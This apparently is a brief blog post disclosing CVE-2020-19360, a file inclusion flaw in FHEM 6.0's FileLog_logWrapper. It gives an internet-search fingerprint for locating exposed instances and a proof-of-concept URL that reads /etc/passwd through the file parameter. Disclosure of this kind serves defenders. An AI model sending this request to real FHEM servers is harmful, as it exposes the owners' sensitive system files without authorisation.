Fhem Filelog_logwrapper Arbitrary File Reading Vulnerability Cve 2020 19360
Fhem Filelog_logwrapper Arbitrary File Reading Vulnerability Cve 2020 19360
Fhem FileLog_logWrapper Arbitrary file reading vulnerability CVE-2020-19360
Vulnerability Description
FHEM has a file inclusion vulnerability in version 6.0. This vulnerability originated from allowing the FHEM/FileLog_logWrapper file parameter to allow an attacker to include files, which can be exploited by the attacker to cause the leakage of sensitive information.
Vulnerability Impact
FHEM 6.0
Network surveying and mapping
title==”Home, Sweet Home”
Vulnerability reappears
Main page
Verify POC
1
/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text
This post is licensed under CC BY 4.0 by the author.